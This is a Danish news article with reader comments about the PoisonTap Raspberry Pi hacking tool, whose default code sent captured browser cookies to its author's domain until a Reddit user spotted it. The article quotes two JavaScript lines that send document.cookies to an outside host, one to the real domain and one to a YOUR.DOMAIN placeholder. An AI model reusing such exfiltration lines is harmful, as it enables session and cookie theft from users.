Kildekode-svipser i Raspberry PI-hackerværktøj: Sendte bruger-cookies til ophavsmandens domæne

En svipser i kildekoden til PoisonTap-hackerværktøjet har tilsyneladende bevirket, at brugeres cookies er blevet sendt til ophavsmanden Samy Kamkars domæne.

Et hyppigt brugt argument for åben kildekode frem for lukket er, at enhver i princippet har mulighed for at kigge med i den åbne kode og byde ind med rettelser eller bare tjekke, om alt ser ud til at være i orden. Spørgsmålet er så, om det sker?

Til tider.

Reddit-brugeren d4nk1st har i hvert fald benyttet sig af muligheden for at kigge i koden til til PoisonTap, som er et stykke ny-offentliggjort hacker-software, der kan køre på en Raspberry Pi Zero.

Læs også: Raspberry Pi-værktøj ransager din låste computer på 30 sekunder

Softwaren får en computer til at tro, at Raspberry Pi'en er et netværksinterface.

Det viser sig at være en sikkerhedsmæssig katastrofe, hvor en ellers låst og tækkelig pc plaprer hemmeligheder videre til den tilsluttede Raspberry Pi. Sidstnævnte kan fjernstyres af en hacker.

Superhacker

Det er superhackeren Samy Kamkar, som står bag PoinsonTap. Det med super er ikke bare for, at det skal lyde smart. Kamkar har adskillige bemærkelsesværdige hacker-projekter bag sig.

Blandt andet har han under projektet SkyJack begået en drone, der via en Raspberry Pi kunne overtage andre droner.

Og så var der projektet MagSpoof, en enhed der kan emulere et vilkårligt magnet-kort.

Det inspirerede et andet projekt, som Version2 omtalte tidligere i år, om som gør det muligt at brute-force ellers låste hoteldøre åbne, hvis nøglen til døren er et magnetkort.

Flere af Kamkars projekter har - ikke overraskende - fået en del medieomtale.

PoisonTap er i den forbindelse ingen undtagelse. Som blandt andet Version2 tidligere i dag har fortalt, gør softwaren det muligt blandt andet at hijacke internettrafik fra offerets maskine, ligesom PoisonTap kan opsnappe HTTP-cookies fra maskinens webbrowser.

Løjerlig kodestump

Det er netop i forhold til cookie-opsnapningen, at d4nk1st er faldet over noget løjerligt i den oprindelige PoisonTap-kode.

En kodestump i en del af værktøjet har nemlig som standard være sat op til at sende opsamlede cookies til Samy Kamkars eget domæne.

Det vil med ifølge d4nk1st sige, at hvis pen-testere, hackere og nysgerrige brugere har hentet kildekoden for så at begynde at teste, ja, så kan eventuelt opsamlede cookies i udgangspunktet være blevet sendt videre til Kamkars domæne.

Den pågældende kodelinje, som d4nk1st har bemærket, så oprindeligt således ud:

new Image().src='http://samy.pl/poisontap/log.php?log='+document.cookies;

Reddit brugeren kalder spøgefuldt projektet for en honeypot - altså et sikkerhedsværktøj bevidst lavet til at tiltrække og studere malware og cyberkriminalitet.

»For at være alvorlig. Jeg håber ikke nogen af jer har forsøgt at teste dette, uden at have opsat jeres egen websocket-server og jeres egen logger i stedet for bare at installere og lave en testkørsel, som giver ham (Samy Kamkar, red.) jeres cookies og alt,« skriver d4nk1st i et indlæg om PoisonTap på Reddit-undersiden /r/netsec/

Til det svarer - hvad der efter tidligere Reddit-indlæg at dømme er - Samy Kamkar selv:

»Oops, jeg har opdateret dette, så det ikke peger på mig længere,« svarer hackeren, der ikke modsiger d4nk1st påstand om, at kodestumpen i udgangspunktet har sendt brugeres cookies mod Kamkars domæne.

Kamkars svar er i skrivende stund 15 timer gammelt, og et kig i GitHub-koden viser en rettelse, så cookie-opsamlingsdelen som standard ikke længere peger på Kamkars eget domæne.

Nu indeholder koden en klar opfordring til at indsætte sit eget domæne.

new Image().src='http://YOUR.DOMAIN/poisontap/log.php?log='+document.cookies;

Tips og korrekturforslag til denne historie sendes til tip@version2.dk
Følg forløbet
Kommentarer (4)
sortSortér kommentarer
  • Ældste først
  • Nyeste først
  • Bedste først
Magnus Jørgensen

Et hyppigt brugt argument for åben kildekode frem for lukket er, at enhver i princippet har mulighed for at kigge med i den åbne kode og byde ind med rettelser eller bare tjekke, om alt ser ud til at være i orden. Spørgsmålet er så, om det sker?

Har denne artikkel ikke selv lige argumenteret for at netop det sker?

  • 12
  • 0
Magnus Jørgensen

Til tider.

Reddit-brugeren d4nk1st har i hvert fald benyttet sig af muligheden for at kigge i koden til til PoisonTap, som er et stykke ny-offentliggjort hacker-software, der kan køre på en Raspberry Pi Zero.

Rart.
Nu er artiklen da i det mindste ikke direkte selvmodsigende.
Spørgsmålet er så om det oftest er hackere der kikker i kildekoden for at finde sårbarheder de kan udnytte eller om det oftest er hackere der kikker i kildekoden for at finde og gøre opmærksom på svagheder. Uanset hvad fakta måtte være på dette spørgsmål lige p.t. så er det i hvert fald ikke nødvendigvis mejslet i sten, at altid skal være sådan. Google har jo endda crowd sourcet problemet med at finde huller i Chrome browseren ved at give en dusør for at finde huller. Her er der helt sikkert en fordel som open source kode har over closed source kode, da det er væsentligt nemmere for hackerene at finde fejl og svagheder hvis de har kildekoden.

  • 2
  • 1
Jakob Møllerhøj Journalist

Nu er artiklen da i det mindste ikke direkte selvmodsigende.

Tak for interessen. Der har nu hele tiden stået 'til tider'. Set fra en mobiltelefon har det muligvis været til at overse, da sætningen ligger lige under billedet af Kamkar.

Selvom der ikke skulle have stået 'til tider', så synes jeg ikke, artiklen ville være selvmodsigende. Det indledende spørgsmål bliver jo netop besvaret af artiklen, som du selv påpeger.

I tilfældet med PoisonTap blev der faktisk kigget i kildekoden, så en sikkerhedsmæssig bommert blev udbedret. Det sker, som bekendt, ikke altid.

Jakob - V2

  • 2
  • 0
Kjeld Flarup Christensen

Det er muligt at kode tjekket ikke sker med det samme. Dog er det ikke muligt at skjule en bagdør, den vil altid være synlig. Den udvikler som har lagt den ind, vil også typisk kunne identificeres. Derfor er der en præventiv effekt, omend det er der sikkert nogen, som er ligeglade med.

  • 0
  • 0
Log ind eller Opret konto for at kommentere
IT Company Rank
maximize minimize